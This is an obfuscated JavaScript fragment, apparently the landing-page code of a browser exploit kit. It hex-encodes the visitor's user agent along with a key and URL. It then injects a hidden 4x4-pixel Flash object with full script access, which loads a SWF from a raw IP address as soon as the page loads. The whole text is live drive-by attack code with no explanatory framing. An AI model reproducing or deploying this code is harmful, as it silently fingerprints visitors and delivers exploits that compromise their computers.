/*s2386d87604hssfj4180fs*/function hgfgerdfgdf(num, width){/*s65945d3138hfj81673fs*/var vcbcvbnfd = "0123456789abcdef";var hgfgghf = "";/*s55888d58665hfj43750fs*/var hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1);while (num > 0xF) {num = num >>> 4;hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1) + hgfgerdfgdf;}var width = (width ? width : 0); while (hgfgerdfgdf.length < width)hgfgerdfgdf = "0" + hgfgerdfgdf;return hgfgerdfgdf;}/*s58931d50692hfj58823fs*/function ghnvbn(u, k) {var fr=String.fromCharCode;var c="", b="", d="", f=fr(0x20), g=fr(0), v=fr(0x22);/*s87326d55031hfj37235fs*/var app=k+v+f+v+u+v+f+v+navigator.userAgent+v+g+g+g+g;app.length%2 && (app+=g);for (var e = 0; e < app.length; e++) {b = hgfgerdfgdf(app.charCodeAt(e),2);d = hgfgerdfgdf(app.charCodeAt(e+1),2);/*sdhd78204hfs*/c += b + d;/*s17788d39752hfj42411fs*/e += 1;}return c;}/*s31802dfsffd*/

	function hfdf(fus,asd)
	{
	var cvbfh = '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd + '" />';
	cvbfh = cvbfh + '<!--[if !IE]>-->';
	cvbfh = cvbfh + '<object type="application/x-shockwave-flash" data="' + fus + '" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd +   '" />';
	cvbfh = cvbfh + '<!--<![endif]-->';
	cvbfh = cvbfh + '<!--[if !IE]>--></object><!--<![endif]-->';
	cvbfh = cvbfh + '</object>';

	var ffert = document.createElement("div");
	ffert.innerHTML = cvbfh;
	document.body.appendChild(ffert);
	} 
	
	hfdf("http://92.53.119.44/?Nzk3MTg3NTQ=&ma=WyjETTfQRmldtfA1Ma9f-oj0CBwUCe05bX_xOPaQsT-sGXEuRo2V_xzLMkd8gmwxOB6FETi-tL&pa=xX_QMvWdbRXQC53EKvrcT6NHMVHRHECL2Y-dmrHQefjaelWkzrHFTF_yozKASwSG6_FtdfJSDV&gift=MjQwOTY5OTI=", ghnvbn("http://92.53.119.44/?ODAwODI5NDI=&pa=xH_QMrDYbR3FFYPfKPnEUKdEMU3WA0eKwY-Zha_VF5yxFDfGpbH1FxzspV-dCF-EmvJvdLAHIwKh1UfASwc&ma=3z49cAVgV8Kin20OEwBSV1pWE_BfZaQsTrJOUQbM92l_9mbARI8khkhfR62NUz-stVVgY4wsamKz7S6OJrg&gift=MzkzMzgzOTQ=","wexykukusw"));